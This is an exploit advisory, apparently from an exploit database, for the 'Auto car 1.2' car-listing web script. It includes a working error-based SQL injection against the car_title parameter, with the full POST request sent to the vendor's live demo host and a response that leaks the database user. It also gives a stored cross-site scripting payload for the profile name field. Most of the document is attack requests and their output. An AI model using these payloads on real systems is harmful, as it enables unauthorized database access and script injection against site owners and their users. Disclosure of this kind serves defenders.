54 lines
No EOL
1.6 KiB
Text
54 lines
No EOL
1.6 KiB
Text
# Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
|
|
# Date: 2018-05-22
|
|
# Exploit Author: Borna nematzadeh (L0RD)
|
|
# Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159
|
|
# Version: 1.2
|
|
# Tested on: Win 10
|
|
|
|
# POC 1: SQLi:
|
|
|
|
# Parameter: car_title
|
|
# Type: Error based
|
|
# Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
|
|
# test: http://target/scripts/autocar_preview/
|
|
|
|
# Request:
|
|
|
|
POST /scripts/autocar_preview/search-cars HTTP/1.1
|
|
Host: kamleshyadav.com
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
|
|
Gecko/20100101 Firefox/61.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://kamleshyadav.com/scripts/autocar_preview/
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 58
|
|
Connection: keep-alive
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
|
|
|
|
# Response:
|
|
|
|
HTTP/1.1 500 Internal Server Error
|
|
Server: nginx/1.12.2
|
|
Date: Tue, 22 May 2018 14:36:47 GMT
|
|
Content-Type: text/html; charset=UTF-8
|
|
Content-Length: 1371
|
|
Connection: keep-alive
|
|
|
|
<h1>A Database Error Occurred</h1>
|
|
<p>Error Number: 1105</p><p>XPATH syntax error:
|
|
':kamleshy_event@localhost:'</p><p>SELECT
|
|
*
|
|
FROM `autocar_car_details`
|
|
WHERE `car_status` = 1 AND `car_title` LIKE '%1' and
|
|
extractvalue(1,Concat(0x3a,user(),0x3a))#%'</p>
|
|
|
|
# POC 2: Cross site scripting:
|
|
|
|
1) Create your account and navigate to "edit profile"
|
|
2) Put this payload in "name" and update your profile:
|
|
<script>alert('xss')</script>
|
|
3) You will have an alert box in your page . |